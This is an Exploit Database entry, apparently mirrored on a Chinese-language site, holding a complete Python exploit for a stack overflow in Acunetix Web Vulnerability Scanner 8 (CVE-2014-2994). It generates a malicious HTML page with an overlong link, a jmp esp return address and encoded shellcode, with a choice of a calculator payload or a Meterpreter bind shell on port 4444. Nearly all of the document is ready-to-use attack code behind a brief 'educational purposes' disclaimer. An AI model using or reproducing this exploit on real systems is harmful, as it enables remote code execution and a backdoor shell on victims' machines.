Acunetix 8 build 20120704 – Remote Stack Overflow

• Exploit Database
• 125 阅读

• 作者： An7i
  日期： 2014-04-24
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32997/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151

  #!/usr/bin/python # Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit # Version: 8 # Build: 20120704 # Tested on: Windows XP SP2 en # Vendor: http://www.acunetix.com/ # Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html # Exploit-Author: Osanda Malith # Follow @OsandaMalith # Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/ # /!\ Author is not responsible for any damage you cause # This POC is for educational purposes only # Video: https://www.youtube.com/watch?v=RHaMx8K1GeM # CVE: CVE-2014-2994 &apos;&apos;&apos; Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger the vulnerability. &apos;&apos;&apos; print (&apos;[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n&apos;) while True: try: choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n")) except ValueError: print "[!] Enter only a number" continue if choice == 1: shellcode ="" shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63" shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b" shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70" shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57" shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e" shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30" shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58" shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b" shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31" shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50" shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77" shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b" shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64" shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71" shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33" shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32" shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35" shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c" shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e" shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b" shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42" shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46" shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53" shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b" shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45" shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d" shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65" shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b" shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61" shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53" shellcode += "\x65\x50\x41\x41" break   elif choice == 2: # Modify this part with your own custom shellcode # msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP shellcode ="" shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31" shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b" shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53" shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37" shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c" shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50" shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38" shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b" shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43" shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50" shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61" shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b" shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66" shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51" shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31" shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72" shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45" shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c" shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e" shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b" shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61" shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66" shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72" shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68" shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d" shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54" shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57" shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70" shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54" shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61" shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73" shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57" shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48" shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48" shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45" shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75" shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35" shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34" shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31" shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50" shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32" shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55" shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30" shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38" shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b" shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"   print "[+] Connect on port 4444" break else: print "[-] Invalid Choice" continue   head = ("<html>\ <body>\ <center><h1>Scan This Site and Get Pwned :)</h1></center><br>") junk = ("\ <a href= \"http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ AAAAAAA") edx = "500f" junk2 = "BBBB" # jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll) eip = "\x49\x63\x52\x4d"   shellcode += "\">" tail = ("<img src=\"http://i.imgur.com/BimAoR0.jpg\">\ </body>\ </html>") exploit = head + junk + edx + junk2 + eip + shellcode + tail filename = "Exploit.htm" file = open(filename, "w") file.write(exploit) file.close() print "[~] " + str(len(exploit)) + " Bytes written to file" #EOF